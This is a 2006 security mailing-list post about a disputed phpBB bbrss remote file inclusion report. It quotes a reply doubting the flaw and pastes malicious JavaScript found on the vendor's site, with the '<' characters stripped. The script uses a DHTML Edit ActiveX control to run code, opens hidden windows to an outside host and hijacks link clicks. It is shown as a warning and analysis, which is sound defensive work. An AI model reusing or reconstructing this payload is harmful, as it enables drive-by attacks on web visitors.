[VIM] bbrss PhpBB (phpbb_root_path) Remote File Inclusion

Steven M. Christey coley at linus.mitre.org
Thu Jun 15 01:50:14 EDT 2006 

On Wed, 14 Jun 2006, George A. Theall wrote:

> [NB: disable Javascript before you visit -- it caused my copy of Firefox
> to crash when I first visited.]

Unfortunately, this site looks like proof that the game has changed.  It
is now too dangerous to even go to a vendor web site to see if they know
about the vuln.  I've been worrying about this happening.

The javascript used a simple substitution cipher that left the "<"
characters alone, so below is the code with the "<" removed.  I'm no
expert, but when I see complex javascript code that references
"DOM.Script.execScript" and various activex clsid's, I get nervous.

Oh, the CLSID is apparently related to some DHTML edit ActiveX control.

- Steve



script language="javascript"
type="text/javascript">wsp_page="http://scripts.ringsworld.com/p.php";
wsp_rnd="1150349947"; wsp_theme="php";
wsp_source="kyNuKQk.Nu8EkfqNGC.yqI/Cukyikkuq8-0qANCk/00Nkk/"; wsp_o2=0;
wsp_o1=""; u = new Array(); function wsp_initVar() { wsp_proc = open;
delay_type = 0; binit = 0; bfinished = 0; wsp_obj = false; } function
utils_blockError() { return true; } window.onerror = utils_blockError;
function pausecomp(Amount) { var d = new Date(); while (1) { mill=new
Date(); diff = mill-d; if( diff > Amount ) {break;} try { wsp_obj.blur();
window.focus(); } catch(ex) { } } try { wsp_obj.blur(); window.focus(); }
catch(ex) { } } function wsp_reload2() { window.document.onunload = null;
window.onunload = null; try { /*wsp_obj.location.replace("about:blank");*/
var u =
wsp_page+"?a=d&r="+wsp_rnd+"&t="+delay_type+"&theme="+wsp_theme+"&source="+wsp_source+"&o1="+wsp_o1;
wsp_obj.location.replace(u); window.focus(); wsp_obj.moveTo
(screen.availWidth/2-800/2,screen.availHeight/2-600/2);
wsp_obj.resizeTo(800,600); } catch(ex) { } } function wsp_load() { try {
if(wsp_obj.closed == true) { return false; } window.document.onunload =
wsp_reload2; window.onunload = wsp_reload2; if(!wsp_o2) { var url =
wsp_page+"?a=c&r="+wsp_rnd+"&t="+delay_type+"&o1="+wsp_o1;
wsp_obj.location.replace(url); } window.focus(); } catch(ex) { return
false; } if(wsp_o2) { wsp_reload2(); } else { if(delay_type == 0) {
setTimeout("wsp_reload2()",1500); } else { pausecomp(1000); wsp_reload2();
} } return true; } function wsp_GetObj(id) { if
(window.document.getElementById) { return
window.document.getElementById(id); } else if (window.document.all) {
return window.document.all[id]; } return 0; } function wsp() {
wsp_init3(); window.moveTo(0,0);
window.resizeTo(screen.availWidth,screen.availHeight); var url =
wsp_page+"?a=d&r="+wsp_rnd+"&t="+delay_type+"&o1="+wsp_o1; X =
windowwspscreenLeft + 10; Y = window.screenTop + 10; if(wsp_o2) param =
"toolbar=yes,location=yes,status=yes,menubar=yes,scrollbar=yes,scrollbars=yes,resizable=yes,top="+Y+",left="+X+",width=10,height=10";
else param =
"toolbar=no,location=no,status=no,menubar=no,scrollbar=yes,scrollbars=yes,resizable=yes,top="+Y+",left="+X+",width=10,height=10";
wsp_obj = wsp_proc(url, "wsp",param); try { wsp_obj.blur();
window.focus(); } catch(ex) { return false; } bfinished = 1; wsp_load();
return true; } function wsp0() { X = 800; Y = 600; var url =
wsp_page+"?a=d&r="+wsp_rnd+"&t="+delay_type+"&o1="+wsp_o1; if(wsp_o2)
param =
"toolbar=yes,location=yes,status=yes,menubar=yes,scrollbar=yes,scrollbars=yes,resizable=yes,top=0,left=0,width="+screen.availWidth+",height="+screen.availHeight;
else param =
"toolbar=no,location=no,status=no,menubar=no,scrollbar=yes,scrollbars=yes,resizable=yes,top="+Y+",left="+X+",width=10,height=10";
wsp_obj = wsp_proc(url, "wsp",param); try { wsp_obj.blur();
window.focus(); } catch(ex) { return false; } return true; } function
wsp_isu(h) { var I; for(I=0;I u.length;I++) { if(h.indexOf(u[I]) != -1)
return 1; } return 0; } function wsp_init3() { anchors =
document.getElementsByTagName('A'); var I; var h; var anchor; for(I=0;I
anchors.length;I++) { anchor = anchors[I]; h =
anchor.getAttribute("href"); if(!wsp_isu(h)) { anchor.onclick = ""; } } }
function wsp_init2() { if(bfinished) return true; anchors =
document.getElementsByTagName('A'); var I; var h; var anchor; for(I=0;I
anchors.length;I++) { anchor = anchors[I]; h =
anchor.getAttribute("href"); if(!wsp_isu(h)) { anchor.onclick = wsp;
anchor.setAttribute("target","_top"); } } if(binit == 0)
setTimeout("wsp_init2()",1000); return true; } function wsp_init() { binit
= 1; } wsp_initVar(); function wsp_init0() { script = ""; script +=
"wsp_page='"+wsp_page+"';"; script += "wsp_rnd='"+wsp_rnd+"';"; script +=
"wsp_theme='"+wsp_theme+"';"; script += "wsp_source='"+wsp_source+"';";
script += "wsp_o1='"+wsp_o1+"';"; script += "wsp_o2="+wsp_o2+";"; script
+= "u = new Array();"; script += wsp_initVar.toString(); script +=
wsp0.toString(); script += "wsp_initVar();wsp0();"; window.moveTo(0,0);
window.resizeTo(screen.availWidth,screen.availHeight);
x.DOM.Script.execScript(script); if(!wsp()) { delay_type = 1; wsp_init2();
} } /script>  div id="wsp_div" style="position:absolute;" wsp="0"> object
id="x" classid="clsid:2D360201-FFF5-11d1-8D03-00A0C959BC0A" width="1"
height="1" align="middle"> param name="ActivateApplets" value="1"> param
name="ActivateActiveXControls" value="1"> /object> /div>

 Anyway, there is no way this "flaw" is
> valid. At the top of the file you have:
>
>   define('IN_PHPBB', true); // to ensure your script works ! //
>   $phpbb_root_path = './';
>   include_once($phpbb_root_path . 'extension.inc');
>   include_once($phpbb_root_path . 'common.php');
>
> as SpC-x says. extension.inc is not part of the bbrss distribution;
> instead, it comes from phpBB. And if you look at it, you'll see all it
> does is set the PHP extension (eg, "php", "php3", ...) and initialize
> the variable $starttime. Thus, there's no way for an attacker to affect
> the value of $phpbb_root_path, at least in the code snipped SpC-x
> quotes in his advisory.
>
>
>
> George
> --
> theall at tenablesecurity.com
>

More information about the VIM mailing list